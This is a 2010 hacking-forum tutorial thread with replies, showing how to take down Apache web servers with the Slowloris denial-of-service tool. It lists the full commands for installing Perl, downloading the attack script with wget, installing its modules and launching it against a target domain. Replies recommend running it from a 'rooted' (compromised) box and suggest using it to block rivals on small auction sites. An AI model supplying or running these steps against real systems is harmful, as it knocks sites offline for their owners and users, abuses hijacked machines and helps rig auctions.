[TUT] How to crash servers with only 1 system[TUT] - Risto - Sep 3, 2010
Hello hackforums. Today i am going to show you how to crash big servers with only 1 box.
Note: this only works crashing webservers that have Apache install, so you cannot attack home computers or game servers like CS, CoD etc...
1. Things You Will Need
- A linux box (rooted, VPS or your own machine)
- Putty (For remote SSH)
- SlowLoris DoS
2. Instructions
1. Get on putty, or start up terminal (i will be using CentOs for this tutorial)
2. Login with root
3. Now write: "yum install perl"
4. Wait until its installed
5. Now write: "wget http://ha.ckers.org/slowloris/slowloris.pl"
6. Wait until its downloaded
7. Now write: "perl -MCPAN -e 'install IO::Socket::INET'" and "perl -MCPAN -e 'install IO::Socket::SSL'
8. After you have it all configured to start the attack use: "perl slowloris.pl -dns example.com"
9. If you need any help write: "perldoc slowloris.pl"
Note: everything is written without quotes

Also, this is DoS, I doubt it will do much damage...

IF you have a good internet connection you can shutdown by your own really average sites!
This is a freaking dos i used it before.

yes it is a dos, and i highly recommend reading what it does before judging, this is the best dos attack, and it uses little bandwith.
and yes you can use backtrack or any *nix system

as i said in my post, its recommended to use rooted system with like 100 mbit line. this does not need big internet, you can dos and browse and be on skype at the same time, this just uses up servers sockets so other users cannot connect
EDIT: this does not crash the server, it just uses up the connection sockets so other users cant connect... so you can use it to win bids on small auction sites:)

you will need root access to initiate the attack.. so uploading a shell to perform an attack will be useless
